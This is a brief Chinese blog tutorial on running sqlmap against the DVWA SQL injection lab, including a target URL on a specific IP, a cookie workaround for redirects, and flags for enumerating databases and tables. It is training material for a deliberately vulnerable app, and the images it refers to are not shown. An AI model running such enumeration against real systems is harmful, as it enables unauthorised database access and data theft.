Dvwa之sql注入

通过url获取数据库、应用系统基本信息、

基本命令: sqlmap.py –u “url”

例如:

Sqlmap.py –u”http://47.105.222.234/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

提示错误302 redirect(302重定向)

解决办法:添加系统产生的cookie信息,使其url链接为有效状态。如下图:

之前可以看到以下信息:

数据库:mysql版本>=5.0  应用服务为php5.4,apache2.4   操作系统:windows(获取信息经过验证真实有效)

遍历整个数据库: --batch --dbs 

遍历指定数据库中表:  –-batch –D –“数据库名” –tables  

遍历dvwa数据库结果:

遍历数据库中的所有表: --batch –tables  

获取当前数据库: --batch –current-db  

根据当前数据库获取所有表数据: -D "数据库" --tables  

 

910cookie-checkDvwa之sql注入
版权声明:该文章为原创 ,转载请注明来源:Dvwa之sql注入 - 测试GO

评论

0条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注